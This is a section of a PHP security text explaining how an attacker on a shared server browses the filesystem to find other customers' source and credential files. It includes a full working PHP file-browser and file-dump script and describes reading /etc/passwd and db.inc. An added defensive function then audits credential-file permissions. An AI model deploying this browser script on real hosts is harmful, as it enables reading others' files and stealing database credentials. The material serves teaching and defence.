8.4. Filesystem Browsing
In addition to reading arbitrary files on a shared server, an attacker can also write a script that browses the filesystem. Because most of your sensitive files are not stored within the document root of the website, such a script is typically used to locate your source files. Consider the following example:
<PRE>
<?php

// Browse the directory given in ?dir=, dump the file given in ?file=,
// or fall back to listing the root of the filesystem.
if (isset($_GET['dir']))
{
    ls($_GET['dir']);
}
elseif (isset($_GET['file']))
{
    cat($_GET['file']);
}
else
{
    ls('/');
}

// Output the contents of a file, HTML-escaped so the browser renders it as text.
function cat($file)
{
    echo htmlentities(file_get_contents($file), ENT_QUOTES, 'UTF-8');
}

// Output a directory listing; readable entries become links back to this script.
function ls($dir)
{
    $handle = dir($dir);

    while ($filename = $handle->read())
    {
        $size = filesize("$dir$filename");

        if (is_dir("$dir$filename"))
        {
            $type = 'dir';
            $filename .= '/';
        }
        else
        {
            $type = 'file';
        }

        if (is_readable("$dir$filename"))
        {
            $line = str_pad($size, 15);
            $line .= "<a href=\"{$_SERVER['PHP_SELF']}";
            $line .= "?$type=$dir$filename\">$filename</a>";
        }
        else
        {
            $line = str_pad($size, 15);
            $line .= $filename;
        }

        echo "$line\n";
    }

    $handle->close();
}

?>
</PRE>
An attacker may first view /etc/passwd or the /home directory to obtain a list of usernames on the server. Then, language constructs such as include or require can be used to find source files stored outside the document root. For example, consider the following script, /home/victim/public_html/admin.php:
<PRE>
<?php

include '../inc/db.inc';

/* ... */

?>
</PRE>
If an attacker manages to view the source of this file, the location of db.inc is revealed, and the readfile() function can then be used to expose its contents and obtain the database access credentials. Thus, storing db.inc outside the document root offers no protection in this environment.
This attack illustrates why you should regard all source code on a shared server as public, and why you should use a database to store all sensitive data.
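As an added, defender-side example that is not part of the original text: a small PHP audit function that reports whether a credentials file such as db.inc carries permission bits that let other accounts on the host read it, which is exactly what makes the "outside the document root" placement above ineffective on a shared server. The function name audit_secret_file and the temporary file used for the demonstration are constructed for this example.

```php
<?php
// Added example: audit whether a credentials file (e.g. db.inc) is readable
// by accounts other than its owner. On a shared host the web server runs every
// customer's scripts under the same uid, so any file the server can read, every
// other customer's script can read too, wherever it sits in the filesystem.

function audit_secret_file(string $path): array
{
    clearstatcache(true, $path);            // make sure we see current perms
    $result = ['path' => $path, 'problems' => []];

    if (!is_file($path)) {
        $result['problems'][] = 'file does not exist';
        return $result;
    }

    $mode = fileperms($path) & 0777;        // drop type bits, keep rwx
    $result['mode'] = sprintf('%04o', $mode);

    // "Other" read bit: every local account can read the credentials.
    if ($mode & 0004) {
        $result['problems'][] = 'world-readable (o+r)';
    }
    // Group read bit: harmless only if the group is not shared with other
    // customers or with the web server; flag it for manual review.
    if ($mode & 0040) {
        $result['problems'][] = 'group-readable (g+r); verify the group is not shared';
    }
    // Readable by this process although owned by a different uid: the web
    // server (and therefore every script it runs) can read the file.
    if (function_exists('posix_geteuid')
        && fileowner($path) !== posix_geteuid() && is_readable($path)) {
        $result['problems'][] = 'readable by the web server process, owned by another uid';
    }

    return $result;
}

// Constructed demonstration: a temporary "db.inc" with a typical default mode,
// then with owner-only access. Nothing here touches real credentials.
$tmp = tempnam(sys_get_temp_dir(), 'dbinc');
file_put_contents($tmp, "<?php \$db_pass = 'constructed-example';\n");

chmod($tmp, 0644);
print_r(audit_secret_file($tmp));          // reports: world-readable (o+r)

chmod($tmp, 0600);
print_r(audit_secret_file($tmp));          // reports: no problems

unlink($tmp);
```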